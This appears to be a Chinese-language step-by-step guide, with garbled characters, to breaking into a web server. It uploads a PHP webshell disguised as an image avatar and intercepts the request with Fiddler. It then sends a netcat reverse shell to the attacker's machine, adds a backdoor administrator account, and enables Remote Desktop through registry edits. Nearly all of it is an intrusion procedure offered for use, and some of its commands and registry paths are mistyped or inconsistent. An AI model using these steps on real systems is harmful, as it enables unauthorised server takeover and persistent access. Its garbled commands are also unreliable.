webshell后門上傳流程

1、將webshell.php的后綴名改成jpg等圖片格式，即web.jpg。

2、打開(kāi)相應(yīng)網(wǎng)址，注冊(cè)好賬號(hào)后選擇上傳頭像將web.jpg上傳期間運(yùn)行fiddler并設(shè)置斷點(diǎn)，切換到raw界面，等到其提示相應(yīng)請(qǐng)求代碼后，將其代碼段中第二個(gè)含有上傳圖片名稱的代碼改成web.php，之后繼續(xù)響應(yīng)請(qǐng)求。

3、此時(shí)已經(jīng)成功把后門程序上傳，將服務(wù)器反饋的代碼中含有路徑的部分復(fù)制粘貼到網(wǎng)站URL后面（注意將？php覆蓋）刷新網(wǎng)頁(yè)。

4、然后輸入相應(yīng)密碼進(jìn)入控制服務(wù)器端，將本機(jī)的nc.exe（netcut）上載到其C盤根目錄下。

5、而后在自己本機(jī)打開(kāi)cmd命令窗口找到nc.exe所在的目錄并運(yùn)行

6、這時(shí)已經(jīng)進(jìn)入nc.exe，在Cmd line:后輸入nc -vv -l -p 8080進(jìn)行監(jiān)聽(tīng)

7、在控制服務(wù)器端選擇Execute Command窗口，輸入'c:\nc.exe -vv [自身ip 端口] -e cmd.exe'啟動(dòng)nc（綁定服務(wù)器端主機(jī)的cmd.exe在本機(jī)的相應(yīng)端口）

8、然后就可以添加自己的賬號(hào)作為管理員了，具體操作是:

(1) net user hacker 3836546 /add （添加用戶）

(2) net user localgroup administrators test /add （添加到管理員組）

9、寫入注冊(cè)表:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

（win2k,winxp,win2k3下開(kāi)啟遠(yuǎn)程桌面,不用重啟）

10、有時(shí)還需要修改3389端口

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp]

11、完成上述流程后，你就可以進(jìn)入服務(wù)器端的主機(jī)進(jìn)行操作